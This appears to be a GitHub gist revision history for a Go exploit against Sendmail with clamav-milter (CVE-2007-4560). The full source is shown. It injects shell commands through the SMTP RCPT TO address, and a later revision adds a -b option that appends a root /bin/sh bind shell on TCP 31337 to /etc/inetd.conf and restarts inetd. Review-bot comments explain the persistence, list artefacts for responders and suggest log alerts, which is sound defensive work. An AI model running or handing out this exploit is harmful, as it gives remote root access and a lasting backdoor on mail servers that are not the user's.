@0xjbb
Last active March 10, 2021 20:09

Revisions

  1. 0xjbb revised this gist Mar 10, 2021. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions CVE-2007-4560.go
    @@ -33,6 +33,7 @@ func main(){
    conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n"))

    }

    conn.Write([]byte("data\r\n.\r\nquit\r\n"))
    }

  2. 0xjbb revised this gist Mar 10, 2021. 1 changed file with 1 addition and 0 deletions.
    1 change: 1 addition & 0 deletions CVE-2007-4560.go
    @@ -25,6 +25,7 @@ func main(){

    conn.Write([]byte("helo you\r\n"))
    conn.Write([]byte("mail from: <>\r\n"))

    if *bind {
    conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"))
    conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"))
  3. 0xjbb revised this gist Mar 10, 2021. 1 changed file with 10 additions and 3 deletions.
    13 changes: 10 additions & 3 deletions CVE-2007-4560.go
    @@ -2,7 +2,7 @@ package main
    // Sendmail w/ clamav-milter Remote Root Exploit
    // 'CVE-2007-4560'
    // coded by https://github.com/0xjbb :)
    // go run CVE-2007-4560.go -h <target ip> -p 25 -c "ping -c 5 <your ip>"
    // go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109"
    import (
    "flag"
    "log"
    @@ -12,7 +12,8 @@ import (
    func main(){
    ip := flag.String("h", "", "Ip Address")
    port := flag.String("p", "25", "Port")
    cmd := flag.String("c", "", "Command")
    bind := flag.Bool("b", false, "Spawn bind shell on target")
    cmd := flag.String("c", "", "Use Command instead of bind shell")
    flag.Parse()


    @@ -24,7 +25,13 @@ func main(){

    conn.Write([]byte("helo you\r\n"))
    conn.Write([]byte("mail from: <>\r\n"))
    conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n"))
    if *bind {
    conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"))
    conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"))
    }else{
    conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n"))

    }
    conn.Write([]byte("data\r\n.\r\nquit\r\n"))
    }
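Review bot: The `-b` branch added in the last hunk makes a persistent change on the remote host that nothing in the file documents: its two recipients append a line to `/etc/inetd.conf` and restart inetd, which leaves an unauthenticated root shell listening on TCP 31337 after the run ends. I would put a comment above `if *bind {` that says so, e.g. `// -b edits /etc/inetd.conf on the target and leaves a root listener on tcp/31337 until that line is removed and inetd is restarted`, so a lab user knows what to clean up and a responder knows which artefacts to look for. The usage comment in the first hunk now names `exploit.go` and two literal addresses, where the other usage line uses the file's real name and the `<target ip>` / `<your ip>` placeholders; the placeholder form is the clearer one to keep. The part of main between the second and third hunks is not shown.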

  4. 0xjbb created this gist Mar 10, 2021.
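--- a/CVE-2007-4560.go
+++ b/CVE-2007-4560.go
@@ -0,0 +1,30 @@
+package main
+// Sendmail w/ clamav-milter Remote Root Exploit
+// 'CVE-2007-4560'
+// coded by https://github.com/0xjbb :)
+// go run CVE-2007-4560.go -h <target ip> -p 25 -c "ping -c 5 <your ip>"
+import (
+"flag"
+"log"
+"net"
+)
+
+func main(){
+ip := flag.String("h", "", "Ip Address")
+port := flag.String("p", "25", "Port")
+cmd := flag.String("c", "", "Command")
+flag.Parse()
+
+
+conn, err := net.Dial("tcp", *ip + ":" + *port)
+
+if err != nil{
+log.Fatal("Connection error: ", err)
+}
+
+conn.Write([]byte("helo you\r\n"))
+conn.Write([]byte("mail from: <>\r\n"))
+conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n"))
+conn.Write([]byte("data\r\n.\r\nquit\r\n"))
+}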
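Review bot: The header comment gives a usage line but never says what the program sends, so a reader has to work it out from the `rcpt to` string near the end of main. A short comment above that write would do: `// RCPT TO local part carries "|<command>"; a vulnerable clamav-milter hands the recipient to a shell`. The header could also note that a `|` or quote character in an SMTP recipient is the thing to alert on in MTA logs. Separately, `-h` defaults to the empty string and `net.Dial("tcp", ":25")` then connects to the local machine, so a run without a target silently talks to localhost; `if *ip == "" { flag.Usage(); return }` after `flag.Parse()` avoids that.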